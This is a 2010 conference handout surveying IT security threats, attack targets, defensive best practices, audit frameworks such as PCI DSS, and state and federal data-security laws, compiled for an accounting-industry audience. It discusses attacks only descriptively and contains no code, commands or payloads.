Docstoc

IT Security - PDF

Document Sample
IT Security - PDF Powered By Docstoc
					IT Security
CalCPA 2010 Wine Industry Conference


  Compiled by Maureen Stubblefield
Contents
Threat Landscape...........................................................................................................................................................3
    Insiders: well-meaning and malicious .......................................................................................................................3
    Cybercriminals ...........................................................................................................................................................3
    Governments / Terrorists ..........................................................................................................................................5
Targets / Application Spaces / Control Points ...............................................................................................................6
    Web Browsers & Plugins ...........................................................................................................................................6
    Websites ....................................................................................................................................................................6
    Social Networks .........................................................................................................................................................6
    Cloud Computing Environments ...............................................................................................................................7
    Internal Networks .....................................................................................................................................................8
    Endpoints ..................................................................................................................................................................8
Security Threat Mitigation .............................................................................................................................................9
    Defense Challenge .....................................................................................................................................................9
    Enterprise Security Best Practices .............................................................................................................................9
    End-User Security Best Practices .............................................................................................................................10
    Toolset .....................................................................................................................................................................10
Regulations & Audit Frameworks ................................................................................................................................12
    Audit Frameworks ...................................................................................................................................................12
    State & Federal Security Legislation ........................................................................................................................13
References ...................................................................................................................................................................14
    Tools & Resources ...................................................................................................................................................14
    Articles.....................................................................................................................................................................14




                                     Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                                                Page 2 of 15
Threat Landscape

Insiders: well-meaning and malicious
       Employees who unintentionally violate data security policies play a major role in data breaches. This is
        due in part to the increasing amount of data that winds up on unprotected endpoints and servers.
        Symantec reports that the number one cause of audit failure within organizations is the lack of employee
        awareness of security policies and/or a lack of enforceable policies relating to data security. A recent
        example of an un-intended data breach was the transmission of personal information affecting 4,000
        employees of the General Services Administration. The federal agency reported that an employee
        accidently emailed a sensitive file while seeking “work-related” assistance. The breach was discovered
        weeks later by routine review of email logs.
       The Ponemon institute reported in a 2009 survey of companies that experienced data breaches, 88%
        resulted from negligence. Examples included leaving unencrypted USB drives with sensitive data in public
        spaces; sending sensitive data using public email accounts such as Gmail; emailing sensitive data to
        unintended recipients; loss of endpoint devices such as smartphones, laptops, and USB drives. Symantec
        Research supports these findings, reporting that the most common type of data breach occurs when
        confidential data has been stored, sent, or copied in an unencrypted form by insiders, and then captured
        in some fashion by hackers.
       Malicious insiders account for an increasing number of data breaches, due in part to the escalation in
        recession related layoffs. A joint survey conducted in 2009 by Symantec and The Ponemon Institute of
        employees who left or lost a job, found that 59% admitted to stealing confidential company information.
        Verizon reported in its 2010 Data Breach Investigations Report that 48% of the 257 data breaches studied
        were conducted by insiders, with 90% being deliberate and malicious involving the misuse of privilege.
        The report concludes that many employees are over-privileged and under-monitored. Wikileaks recent
        exposure of 400,000 classified military logs pertaining to the Iraq war is an example of a relatively low-
        tech operation carried out by an insider – a disenchanted, low-level Army intelligence analyst who for an
        extended period of time was able to exploit a security loophole. Most recently, the New York Times
        published excerpts from some 250,000 individual cables, the daily traffic between the State Department
        and more than 270 American diplomatic outposts around the world. Wikileaks obtained the documents
        allegedly from the same individual that obtained the previous documents.
       A 2009 report by the Open Security Foundation, disclosed an unexpected discrepancy between potential
        and realized cases of identity theft. Though the study focus was on identity theft, the findings support the
        fact that the insecure use and storage of data significantly increases the potential for serious data
        breaches. They found that physical theft or loss accounted for 37% of data breeches that could have
        resulted in identity theft, while only resulting 4% of actual identity exposure. During the same time
        period, electronic hacking accounted for only 15% of potential identity theft breaches, but 60% of actual
        identities exposed. Insecure data access policies accounted for 26% of potential breaches, and 35% of
        actual identities exposed.

Cybercriminals
       Cybercriminals dominate the threat landscape, and are rapidly building increasingly sophisticated
        networks for developing and distributing advanced vulnerability detection, intrusion, and data capture
        tools and technologies. These networks are composed of thousands of loosely affiliated specialists
        around the globe. They remain elusive, decentralized, and self-healing, rendering them nearly impossible
        to track and eradicate.
       One of the largest computer crime incidents ever reported was orchestrated in 2008 by Albert Gonzalez
        from the U.S., and two Russian co-conspirators. Using a widely decentralized, multi-national
        cybercriminal network, they organized a highly sophisticated attack that broke into several major financial
        institutions, stealing data from more than 130 million credit and debit card accounts. Heartland Payment


                       Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                    Page 3 of 15
    systems, a company that processes credit card payments for thousands of stores and businesses around
    the country was a key target in this attack.
   The U.S. continues the lead in originating malicious cyber attacks and also takes the lead as the target of
    such attacks. There has however been a significant shift in malicious activity towards emerging countries
    as their Internet infrastructure and broadband usage grows. For example, Brazil was ranked third in
    cybercrime activity in 2009, the first year that a country other than the U.S., China, or Germany ranked in
    the top three.
   Attack profiles often cross national borders; launched from one country to an entity in a second country,
    channeling breached data to yet a third country. This decentralization of attack components compounds
    the difficulty of tracking and eradicating the perpetrators. For example, the Russian Business Network
    (RBN), a well-funded underground professional organization, excels in the international distribution of
    malicious code, malicious website hosting, and other malicious activity. RBN increasingly leverages the
    growing infrastructure of emerging countries such as Brazil, and has been credited with creating about
    half of the total phishing incidents that have occurred worldwide.
   The primary motivation of cybercriminals is financial gain, intelligence and intellectual property theft, and
    process disruption. The FBI reported that in 2009, cybercrime increased 23%, while financial losses from
    attacks more than doubled, demonstrating the growing efficacy and sophistication of these cybercriminal
    networks. These statistics under-report the magnitude of the problem as a significant number of attacks
    go undocumented.
   Symantec reported that 75% of enterprises surveyed experienced some form of cyber attack in 2009,
    while Kaspersky Labs reported 30,000 new threats discovered every day. CNET reported in October 2009
    that 63% of midsized organizations saw an increase in cyber threats and that 71% think a serious breach
    could put them out of business. Symantec reports that during the first quarter of 2010, there were over
    327 million attempts made to infect computers globally, a 26.8% increase over the previous quarter.
    During same period, more than 119 million malware hosting servers were detected.
   A major factor driving the rapid rise in cybercrime is the growing potential for low-risk financial gain.
    Individual exposure is reduced and barriers to entry lowered with simple “one click” access to low-cost,
    highly specialized, automated and customizable crime attack toolkits. A thriving underground
    marketplace provides access to these tools and services, offering pre-deployed botnets, vulnerability
    seekers, website attack kits, and frame coders to name a few. Several crimekits have gained in popularity,
    spawning competition and new business models among their developers. They are competing on the
    ground level for market share, employing tactics such as intercepting communications of competing
    crimekits when detected on the same hacked system. Crimekits such as Zeus and SpyEye are readily
    available for about $700 on the underground economy, with many others available for free on various
    underground forums. Botnet infected computers are advertised in the underground economy for as little
    as 3 cents per computer, providing the base infrastructure for wide-scale attacks. Sophisticated utilities
    automate changes in the crimekits, resulting in polymorphic threats that render traditional antivirus
    detection technologies all but useless. In 2009, Symantec observed nearly 90,000 unique variants of the
    basic Zeus toolkit, and created 2.8 million new malicious code signatures, a 71% increase over 2008 due to
    a continuous release of new variants. On one particular day in 2009, Kaspersky created 13,500 signatures.
    These statistics make it clear that signature-only detection is no longer effective. Heuristic, behavioral,
    and reputation-based techniques need to be added to the anti-malware arsenal.
   In addition to tools and services, the underground marketplace provides access to FTP credentials for
    thousands of legitimate websites, credit card numbers, bank accounts, and more. One popular tool for
    website exploits helps the attackers manage FTP credentials, tests the credentials, sniffs sites for specific
    vulnerabilities and automates web page alteration.
   Search engine poisoning is commonly used by cybercriminals to elevate malicious sites including those
    appearing to provide “free” security software such as Spyware Guard, Spyware Secure and XP Antivirus to
    the top of the list, increasing their appearance of legitimacy.

                   Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                 Page 4 of 15
Governments / Terrorists
       Cybercrime is emerging as one of this country’s most publicized national security concerns with 12-14
        billion dollars being spent annually by the National Security Agency. According to the Symantec 2010
        State of Enterprise Security Report, cybercrime now outranks traditional crime, natural disasters and
        terrorism as the top risk to large organizations and governments. While the “enemy” remains elusive and
        dispersed, the threat is real. An increasing number of countries and nation states are directing a
        significant amount of resources to cyber-security, including China, Russia, Germany and Israel to name a
        few. Steven Chabinsky, a senior FBI official responsible for cyber-security reported that “given enough
        time, motivation and funding, a determined adversary will always-always-be able to penetrate a targeted
        system.”
       While security experts may disagree on the prioritization of specific attack venues by cybercriminals, they
        are in agreement as to the growing potential to compromise mission critical infrastructures and to
        infiltrate sensitive communication channels. Experts classify attack venues as cyber-war when networks
        are penetrated for the purpose of disrupting or dismantling them to the point of making them inoperable,
        and cyber-espionage when electronic communications are captured for the purpose of gathering national
        security or commercial intelligence.
       The Stuxnet worm, designed to specifically target specialized Siemens instrumentation, is a clear case of a
        cyber-war attack. It is believed to have found its way into Iran’s “closed” critical national infrastructure
        via a contractor’s removable drive, since the target network had no connections to the Internet. It is
        believed that the worm was developed under the direction of a government or nation state, with specific
        focus on the U.S. and/or Israel as possible initiators.
       There has been a recent upsurge in the sophistication of malicious computer activity associated with
        China. For example, The National Defense Magazine reported in November 2010 that a state funded
        telecommunications company, China Telecom, re-routed Internet traffic to and from websites of the U.S.
        Senate, the Department of Defense, and "many others" including NASA, for 18 minutes on April 8. It is
        estimated that 15% or more of all Internet traffic was re-routed during this time, making it the largest
        hijack ever witnessed and stunning security experts worldwide. The amount of potential data breached is
        unknown, but could be huge. Dmitri Alperovitch, Vice President of Threat Research at McAfee, suggests
        that the Chinese may have carried out eavesdropping on unprotected communications including emails
        and instant messaging, manipulated data, and/ or decrypted data. The technique used to perform the re-
        route has never before been executed on such a large scale, and is now a part of the toolset of
        cybercriminals worldwide. The New York Time just reported that China’s Politburo directed the intrusion
        into Google’s computer systems in that country. The Google hacking was part of a coordinated campaign
        of computer sabotage carried out by government operatives, private security experts, and Internet
        outlaws recruited by the Chinese government. The recent release of cables by Wikileaks reports that they
        have infiltrated computers of the American government, Western allies, and American businesses since
        2002.
       To date, no cyber attacks have been linked directly to terrorist groups, though it seems inevitable that
        cybercrime will become a key component in the arsenal of these organizations, given the potential for
        massive systems disruption with increasingly lower barriers to entry.




                       Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                    Page 5 of 15
Targets / Application Spaces / Control Points

Web Browsers & Plugins
       Symantec reports that the top Web-based attacks observed in 2009 primarily targeted vulnerabilities in
        Internet Explorer and applications that process PDF files.
       ActiveX technologies constituted the majority of new browser plug-in vulnerabilities, followed closely by
        Adobe Reader, Flash, QuickTime and Java extensions and plug-ins.
       The following table demonstrates that browser market share influences attack frequency far more than
        the number of detected vulnerabilities. Firefox is reported to have the most number of vulnerabilities
        with the largest exposure window (days between vulnerability detection and patch availability), yet
        Internet Explorer and Chrome are the most commonly exploited.

                      Browser          Vulnerabilities         Exposure (days)
                       Firefox               169                        13
                       Safari                94                         1
                  Internet Explorer          45                         1
                      Chrome                 41                         1

Websites
       Websites continue to be a favored attack vector as the number of new sites and supporting technologies
        grow along with the exponential rise in Internet surfing. Web-based attacks have replaced mass-mailing
        worms as primary entry points for malicious activity.
       77% of websites that contain malicious content are completely legitimate sites that have been
        compromised by cybercriminals. Small businesses, state and local governments, and educational
        institutions are specifically being targeted as they are often behind in security spending and protection.
       The most straightforward method used to compromise websites is through administrative access with
        valid credentials. Attackers often capture FTP credentials using malware installed on the Web developer’s
        computer. In 2009, security researchers at VeriSign discovered a Command & Control server that
        contained credentials for 88,000 FTP servers.
       Compromised websites can perform a host of malicious actions including downloading malicious code
        onto visitor’s computers, gaining personal information through seemingly valid web-forms, and by
        masquerading as legitimate sites to obtain user information such as credit card numbers, banking
        credentials, etc.
       SQL Injection is a technique used to infect Web servers with code that redirects users to sites containing
        malicious content and downloads. For example, in 2009 an attacker automated the infection of more
        than 125,000 web sites with a single iFrame that installed a downloader Trojan from a Chinese server.
       Attackers leverage website vulnerabilities to plant obfuscated JavaScript that is specifically tailored to
        download malware as users hit the site. Know as a “drive-by download”, users are infected simply by
        visiting legitimate sites that have been compromised.

Social Networks
       Social networking communities are an intrinsic part of todays Internet, with companies leveraging social
        media to target an increasingly eclectic customer base. In July, Facebook announced they have over 500
        million users. These growing networks have become a fertile ground for cybercriminals.
       Symantec’s 2010 report “The Risks of Social Networking”, provides a detailed assessment of cybercrime in
        the social network realm. The supporting platforms are constantly evolving and becoming more complex,
        and vulnerabilities in their frameworks continue to be discovered and exploited. User privacy can be
                          Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                         Page 6 of 15
       breached by gaps in the underlying framework, embedded applications that have leaked information, and
       by skillfully designed social engineering.
      Most social network sites allow for automated access with scripts that attackers can use to crawl the
       network, collect email addresses, real names, and even context data such as hobbies, enabling clever
       social engineering attacks to be constructed. Many sites allow third party applications such as Farmville
       to access user data through multiple application interfaces. In addition to legitimate functions, these
       applications are capable of introducing weaknesses into a user’s profile, which can lead to serious data
       breaches. For example, there are numerous reports of application vulnerabilities that allow permissions
       granted to a legitimate application to be shared by a malicious application. As a result, any installed
       application can constitute an indirect security risk.
      Twitter was compromised with phishing tweets containing URL’s that redirected login information. The
       malicious destinations were obscured by URL-shortening utilities used to include links within the 140-
       character limit. This was followed by a mass worm carried in the form of fake Twitter invitations used to
       gather email addresses from the compromised computers, and then spread by copying itself to removable
       drives and shared folders.
      Brand reputations of social networks are often leveraged in order to provide credibility to bulk email sent
       outside the social network. For example spoofed email claiming to come from the site’s support center
       may notify users of password-reset requirements. These often contain links to malicious websites or
       contain malicious attachments.

Cloud Computing Environments
      Security concerns are one of the main reasons given by organizations for not adopting Cloud technologies.
       A 2010 Forrester survey of 211 North American & European Enterprise Software Decision Makers ranked
       security as a leading concern in avoiding the Cloud for applications supporting sensitive data. The
       evolution of Cloud technologies has outpaced efforts to build comprehensive industry standards relating
       to security. Cloud security standards are weak, with controls are often not transparent or auditable.
       Many cloud vendors will not provide transparency as to the controls used to secure their data centers and
       infrastructure, saying that doing so would increase their exploit vulnerability. Cloud customers, never the
       less need to be tenacious in learning how data is secured and segregated in multi-tenant systems.
      Though an increasing number of Cloud vendors tout SAS 70 compliance, the audit standard was not
       intended to account for the layered controls inherent in the Cloud architecture. ISO27002, while more
       applicable to some aspects of the Cloud environment, was also not designed to address the multi-vendor
       layered infrastructure. Gartner analyst Neil MacDonald, while acknowledging that ISO270001 is not
       sufficient, sees it to be the best security specification to-date for the Cloud. Microsoft’s cloud
       datacenters comply with ISO270001, with Amazon soon to follow.
      Identity management, such as role-based access controls, has not matured and is complicated by the
       anywhere anytime access model inherent in the Cloud model. Google has attempted to address this issue
       with its “Secure Data Connector”, which uses a secure encrypted connection between the data and the
       applications. This type of solution will not scale well as companies adopt multiple cloud-based solutions
       with differing access controls.
      Existing laws and regulations related to security also impact cloud adoption. Data privacy laws in Europe
       block the movement of personal data to any place outside the EU unless the data is protected under the
       same laws as in the EU, which is not common. As a result, European companies are not legally able to
       employ Cloud services for employee or customer data. In the U.S., Federal regulations such as the Federal
       Information Security Management Act (FISMA) require vendors to keep sensitive data within the country.
       In response, Cloud vendors are building government Clouds in order to receive FISMA certification to
       service these federal agencies, while Cloud vendors say that this type of requirement is not scalable to the
       “Public Cloud”.


                      Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                   Page 7 of 15
       The Cloud Security Alliance (CSA), a non-profit organization, was founded in 2008 to promote the use of
        “best practices” for providing security assurance within the Cloud computing environment and promises
        to provide comprehensive security control guidelines targeted specifically at the complexities of Cloud
        architecture. CSA published “Top Threats to Cloud Computing” in March 2010. The document will be
        updated on a regular basis and is available on the CSA website. One of their stated goals is to provide
        education on the uses of Cloud computing to “help secure all other forms of computing”. Much of the
        information contained in CSA publications and on the website is applicable to traditional computing
        environments.

Internal Networks
       Significant focus has been placed on securing the local network perimeter resulting in fewer attacks
        targeting this space. The core network infrastructure changes less frequently and is more easily brought
        under the purview of strict change control procedures and centralized security management.
       Firewalls can be configured to limit Internet-based traffic and control source access to the internal
        network infrastructure. Security appliances in combination with antivirus software can inspect and filter
        egress and ingress traffic and set alert thresholds to detect malicious activity.

Endpoints
       As network perimeter security has become more effective in mitigating data breaches, devices such as
        desktops, laptops, and mobile devices have become primary entry points for malicious activity. They are
        ubiquitous and have underlying technologies that continually change making them one of the top security
        challenges.
       Kaspersky reports that 88% of Fortune 500 companies have compromised PCs running Trojans in their
        environments, moving terabytes of corporate data to stealthy drop zones scattered about the cybercrime
        infrastructure. Deep access at the root level on an endpoint device can provide an attacker with access to
        any system the user can access, including data as well as credentials and access to other organizational
        applications. Trojans can record all Internet-related traffic, perform keystroke logging, and intercept
        emails, browser-stored passwords, and a long list of additional items. In addition, the endpoint device can
        be transformed into a “zombie” machine as part of a larger botnet using it to spread malware to other
        systems within and outside of an organization.
       Applications downloaded by users including WinZip, RealPlayer, QuickTime, Adobe PDF and browser plug-
        ins are becoming favored entry points. They are typically undocumented, full of vulnerabilities, and
        seldom patched or updated. IT departments rarely know what applications, never mind the versions and
        patch levels running in their environments.
       Endpoint devices do not even need Internet access to be vulnerable. A 2009 data breach of highly
        classified information at the Pentagon targeted servers that were never directly connected to the
        Internet. Hackers gained access computers belonging to third-party contractors hired to work on a fighter
        jet. This attack demonstrates the type of sophisticated reconnaissance in which cybercriminals often
        engage.
       Smartphones are ripe endpoint targets for hackers as they adapt their tested methods for infecting
        computers to attack Internet enabled mobile phones. The largest reported smartphone breach occurred
        on Android phones whereby certain wallpaper apps opened phones to hackers who harvested phone
        numbers and other stored data and transmitted it to websites in China. The number of attacks targeting
        smartphones is expected to grow exponentially, and as enterprise organizations such as the financial
        services and healthcare industries continue to adopt phone-based applications, the risk of exposure will
        continue to increase. Smartphone security vendors include ESET, F-Secure Mobile, Kaspersky, and Trend
        Micro whose products include features such as mobile virus and firewall protection, and the ability to lock
        or wipe a stolen phone.


                       Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                    Page 8 of 15
Security Threat Mitigation

Defense Challenge
       Malware is in a state of rapid evolution as evidenced by Symantec’s 2009 report showing a 71 percent
        increase in the generation of malicious code signatures over 2008. In addition, more than 240 million new
        malicious programs were identified, a 100 percent increase over 2008.
       With anti-malware vendors producing up to 20,000 new malicious code signatures each day to meet the
        exponential growth, false positive detection is becoming more prevalent, resulting in widespread system
        crashes.
       The current model of malware detection is like a war in which the attacker fires first, and only after
        significant damage is incurred can action be taken to guard against a similar attack. Vendors agree that
        the reactionary, signature based model is flawed and cumbersome to implement and maintain. Heuristic,
        behavioral, and reputation-based detection schemes are increasingly being incorporated in security
        suites. Systems performance degradation is often an unfortunate by-product of beefed-up security.
       A recently discovered category of malware coined AET (Advanced Evasion Techniques) is designed to slip
        past most intrusion prevention systems and deliver exploits to targeted machines without leaving a trace.
        Computer Emergency Response Teams (CERTs) in several countries have recently notified dozens of IPS
        vendors so they can build in protection. An AET attack aggregates known exploits that an IPS would
        typically detect, but in combination, they slip past best of breed IPSs.

Enterprise Security Best Practices
       Appoint a security administrator with authority and responsibility to oversee and enforce enterprise-wide
        security.
       Limit the exposure surface by disabling and/or removing unnecessary services on servers and in
        application spaces such as IIS and SQL.
       Explicitly budget for a “depth in defense” security model that incorporates multiple mutually supportive
        defensive systems to guard against single-point failures in any specific technology or protection method.
                Leverage appliance-based security devices that include automatic updates such as Internet traffic
                 filters, vulnerability scanners, mail filters, and intrusion detection/protection systems.
                Perform ingress and egress filtering on all network traffic to scan for malicious activity and
                 unauthorized communications.
                Implement Network Access Protection (NAP) to control access to network resources based on
                 security profile of attaching device and granularly configured client profiles and access policies.
                 Configure NAP to clean infected clients prior to rejoining the network. Isolate infected systems
                 quickly to prevent the risk of further infection within the enterprise. Determine how the system
                 became infected and patch the vulnerability on all systems.
                Automate security enforcement where possible.
                Centralize security patch and antivirus management for all servers and endpoint devices.
                 Gartner Research reports that as many as 85% of network attacks that successfully penetrate
                 network defenses are made through vulnerabilities for which patches have been released.
                Increase focus on securing endpoint devices. Ensure that network security policies and
                 protection software is applied to and updated on all devices regardless of location.
                Secure the corporate website. Acunetix, a security vendor found 70% of 3,200 scanned
                 corporate and non-commercial organization websites contained serious vulnerabilities.
                 Implement Web-server log monitoring to track if and when complete downloads of company


                       Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                    Page 9 of 15
                   websites, logos, and/or images are occurring. This may indicate an attempt to duplicate the
                   legitimate website to create an illegitimate site for phishing.
                  Limit application and web browser installation and plug-ins to system administrators via policy.
                  Enforce password policies with complexity requirements and require that they be changed on a
                   regular basis. Passwords should not contain words from the dictionary.
                  Implement multifactor authentication for access to sensitive data including that contained on
                   endpoint devices such as laptops.
         Implement the least privilege rule for all critical data and systems. Restrict user permissions to the
          absolute minimum necessary to perform their work, and review access permissions on a regular basis.
         Conduct regular employee security trainings, and create a network use policy to be signed by employees.
         Institute change control procedures to bring new data flows under the security umbrella. Follow a data
          lifecycle plan that includes the secure archival and/or destruction of legacy data.
         Conduct regular audits of the corporate network. Implement third party compliance audits, such as PCI
          DSS, as well as internal audits of data access, user permissions, account additions and/or changes.
         Ensure disaster recovery procedures are in place including a backup-and-restore solution with adequate
          retention in order to restore lost or compromised data in the event of a successful attack or catastrophic
          data loss.

End-User Security Best Practices

         Avoid following links from email, as they can redirect to spoofed or malicious web sites. Instead,
          manually type the URL to ensure you are connecting to the legitimate original site.
         Never view, open, or execute email attachments unless the attachment is expected and comes from a
          known and trusted source. Be suspicious of any emails that are not directly addressed to you.

         Be cautious of pop-up windows and banner advertisements that mimic legitimate displays. Suspicious
          error messages displayed inside the web browser are common methods used by rogue security software
          scams to lure users into downloading and installing malicious code.
         Never disclose confidential personal or financial information unless and until you can confirm that the
          request for information is legitimate.
         Do not conduct high-risk activities such as on-line banking from public computers.
         Encrypt sensitive data on endpoint devices such as USB keys, backup devices, laptops, smartphones, etc.
         Secure critical data while in transit over public networks including email, instant messaging, and file
          transfers.

Toolset
         Firewalls are a basic line of defense for restricting specific types of traffic and limiting other types to only
          certain source addresses. Ensure that your firewall only allows traffic that is essential for business.
         Web Content Filters analyze egress and ingress network traffic, filtering out malicious communications.
          They can be appliance, cloud, or software based. Barracuda is a leading appliance vendor and OpenDNS is
          a leading cloud-based vendor. Both solutions provide regular content updates.
         Vulnerability Scanners seek out known weaknesses using databases that are constantly updated by
          vendors to track down devices and systems on the network that are open to attack. They detect unsafe
          code, misconfigured systems, malware, and patches and updates that should be applied. They are also
          valuable in detecting systems that are not authorized to be on the network.

                          Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                       Page 10 of 15
   Intrusion Detection & Protection Systems are devices or software applications that monitor network
    and/or system events for malicious activities or policy violations. (Securitytools.org)
   Anti-Malware Software should be installed on systems to constantly monitor file access and detect
    dangerous code before it is allowed to launch. It should be centrally managed to ensure that it is active
    and kept up to date. Additional tools are sometimes necessary to clean stubborn infections. A list of
    reputable and effective tools is included in the resources section at the end of this document.




                   Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                Page 11 of 15
Regulations & Audit Frameworks

Audit Frameworks
Organizations report that enterprise security compliance is becoming increasingly difficult due to the complex
nature and rapid pace of technology innovation, and the fragmented compliance landscape. Critics complain that
many security-related laws and regulations are overreaching and create a “culture of compliance”, focusing on
verbose procedures rather than results. Many experts suggest that the less specific a regulation is, the more
effective it is likely to be. Making it technology neutral and not specifying what tools or products to use, but rather
enabling organizations to select controls appropriate to the level of risk presented by a system. Several emerging
standards strive to strike a balance by requiring a standardized, auditable and repeatable approach to managing
information security; PCI DSS and CloudAudit A6 are examples.
         PCI DSS The Payment Card Industry Security Standards Council was formed in 2006 with a mandate from
         the payment card industry to develop guidelines to protect consumers. The standard includes 12
         requirements for any business that stores, processes or transmits payment cardholder data and specifies
         a framework for securing a payment environment. The 2008 standard went into effect July 2010. In
         October 2010, with feedback from over 1500 individuals representing 600 organizations around the world
         including merchants, banks, and processors, PCI SSC updated the standard to Ver. 2.0, schedule to go into
         effect January 2011 for 3 years. The new standard is reported to provide greater clarity and flexibility and
         to facilitate improved understanding of the requirements simplifying implementation for merchants. The
         council provides certification for independent Qualified Security Assessors that can assist organizations in
         assessing and reaching compliance and filing the required reports. Though PCI compliance is not federally
         mandated, it is required by an increasing number of processors and merchant banks. Penalties for non-
         compliance can include $5K-$100K penalties per incident, lawsuits, insurance claims, canceled accounts,
         payment card issuer fines, government fines, etc. Because PCI DSS is not a law, it is important to know
         that supplier contracts that state the solution complies with “all laws” don’t necessarily cover PCI.
         ISO/IEC 27002:2005 is an international standard that establishes guidelines for initiating, implementing,
         maintaining, and improving information security management in an organization. The objectives provide
         general guidance on the commonly accepted goals of information security management and specific
         controls in the following areas of information security management: security policy, asset management;
         HR security; environmental security; communications, access control; information systems acquisition,
         development and maintenance; security incident management; business continuity management;
         compliance
         CSA-CloudAudit A6 is an independent, global, non-profit organization CloudAudit was officially launched
         in January 2010 with the active participation of many of the largest cloud computing providers,
         integrators and consultants. In October 2010 it became a project of the Cloud Security Association. The
         goal of CloudAudit is to provide a common interface and namespace that allows cloud computing
         providers to automate the Audit, Assertion, Assessment, and Assurance (A6) of their infrastructure (IaaS),
         platform (PaaS), and application (SaaS) environments and allow authorized consumers of their services to
         do likewise via an open, extensible and secure interface and methodology. The Cloud Security Association
         released an update to their security controls framework for cloud provider and cloud consumers which
         covers security controls relevant to all IT environments and addresses regulations including PCI-DSS,
         HIPPA, etc. http://cloudsecurityalliance.org/Research.html
         ISACA is an independent, nonprofit, global association that engages in the development, adoption and use
         of globally accepted practices for information systems. COBIT provides a framework to bridge the gap
         with respect to control requirements, technical issues and business risks, and communicate that level of
         control to stakeholders. COBIT enables the development of clear policies and good practice for IT control
         throughout enterprises. Though not specific to the security realm, the process structure of COBIT and its
         high-level, business-oriented approach provide an end-to-end view of IT.



                        Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                     Page 12 of 15
State & Federal Security Legislation
With different states mandating various forms of security controls organizations are required to comply with
multiple sets of “reasonable security” requirements for each state where they have customers making compliance
both confusing and expensive. As a consequence, there is growing focus on a single security control framework led
by PCI DSS. Every company, whether directly affected by industry or governmental regulations, should have an
explicit security policy encompassing how confidential data enters the organization, how it is accessed, and how it
is stored and archived. The policy should include actions to be taken in the event of a security breach, which
typically includes customer and card issuer notification.
    California AB 1950 (2005) requires businesses that process personal information about California residents to
    “implement and maintain reasonable security procedures and practices to protect personal information from
    unauthorized access, destruction, use, modification or disclosure.” It has since been used as a basis for private
    and class action lawsuits and a model for other states’ legislation including Massachusetts, Minnesota,
    Nevada.
    Washington HB 1149 (2010) provides issuing banks a legal mechanism to collect costs related to reissuing
    payment cards after a security breach. Unlike AB 1950, there is not an explicit requirement to take reasonable
    care to avoid a breach; companies that fail to do so may be liable to pay for re-issuance costs after a breach.
    Massachusetts 201 CMR 17 (2010) is regarded as being the most comprehensive and calls for the need to
    discover and protect sensitive data in a manner that is absent from other laws that are being passed. It
    requires that every business that owns or licenses personal information about a resident of the
    Commonwealth of Massachusetts be in compliance. Personal data is defined as resident’s first name and last
    name or first initial and last name in combination with any one or more of the following: SSN; drivers license
    number or state-issued ID number; financial account number, or credit or debit card number, with or without
    any required security code, access code, personal identification number or password, that would permit
    access to a resident’s financial account.
    Federal Trade Commission Act, 15 U.S.C § 45(a). Currently there are no federal laws that explicitly mandate
    security controls though the FTC has taken action by claiming that organizations have engaged in “unfair
    practices” in violation of Section 5(a) of the Federal Trade Commission Act, 15 U.S.C § 45(a). For example, the
    FTC took action and imposed a 20-year security audit requirement on TJX following the 2007 security breach
    involving 50-90 million credit cards. The ruling said that the company failed to use “adequate security” in
    protecting the card data. “Adequate security” remains undefined though PCI DSS compliance would most
    likely satisfy the requirement.




                       Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                    Page 13 of 15
References

Tools & Resources
          AV Comparatives Mobile Computing - http://www.av-comparatives.org/
          Security Tools http://sectools.org/ids.html
          Cloud Security Alliance
                     Security Guidance for Critical Areas of Focus in Cloud Computing V 2.1 Dec 2009
                     Top Threats to Cloud Computing V1.0 March 2010
                     http://cloudsecurityalliance.org
          Crime Complaint Center (IC3): http//www.ic3.gov/default.aspx provides a set of guidelines on how to
           avoid Internet-related scams.
          Mobile Security Guide – Smartphones, Netbooks, Laptops, and PDAs
           http://www.firewallguide.com/pda.htm
          Open Security Foundation DATALOSSdb – datalossdb.org
          OpenDNS Web content filtering - http://www.opendns.com
          Payment Card Industry Security Standards Council (PCI SSC): https://www.pcisecuritystandards.org)
          Pinpointing your Security Risks - http://www.itsecurity.com/features/pinpointing-your-security-risks-
           040507/
          Symantec Global Internet Security Threat Report Vol. XV, Pub 4/10 - http://symantec.com
          Ten Ways IT Enables Cybercrime, Sept 2010 - http://usa.kaspersky.com/resources
          The Top Cyber Security Risks – http://www.sans.org/top-cyber-security-risks/#
          U.S. Computer Emergency Readiness Team (U.S. CERT) - http://www.us-cert.gov/current/
          Malware Removal Tools
                    Malware Bytes
- http://www.malwarebytes.org/

                    Spybot Search & Destroy
- http://www.safer-networking.org/en/home/index.html

                    Spyware Removal Tools by ESET - http://www.eset.com/download/free-antivirus-utilities

                    Rkill - http://www.bleepingcomputer.com/forums/topic308364.html
                    ComboFix - http://www.bleepingcomputer.com/combofix/how-to-use-combofix
                    Hijack This! - http://free.antivirus.com/hijackthis/



Articles
          China Telcom Denies US web hijack allegations - The Economic Times, Nov 18, 2010
          Cyber Experts Have Proof That China Has Hijacked U.S.-Based Internet Traffic -
           http://www.nationaldefensemagazine.org
          Financial Services Like the Cloud, Provided it’s Private - http://www.informationweek.com/cloud-
           computing/blog/archives/2010/05/financial_servi.html
          Five Problems with SaaS Security, Jon Brodkin, NetworkWorld, Sept 2010
          Government Computer News (GCN) - http://gcn.com/articles/2010/03/29/cybereye-032910.aspx


                            Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
                                                         Page 14 of 15
                                                                    th
   The States Take Action: 5/5/2010: Washington Becomes the 5 State to Give Data Privacy Some
    Legislative Teeth.
   Hackers find a Home in Amazon’s EC2 Cloud - http://www.infoworld.com/d/cloud-computing/
   Implications of Iran Cyberattack - Sept 2010 http://www.theglobeandmail.com/news/technology
   Malware Security Report: Protecting Your Business, Customers, and the Bottom Line – Verisign 2010
    whitepaper
   McAfee debacle shows why malware defense must evolve, http://www.pcworld.com/businesscenter
   New Malware Technique targets Intrusion-Prevention Systems –
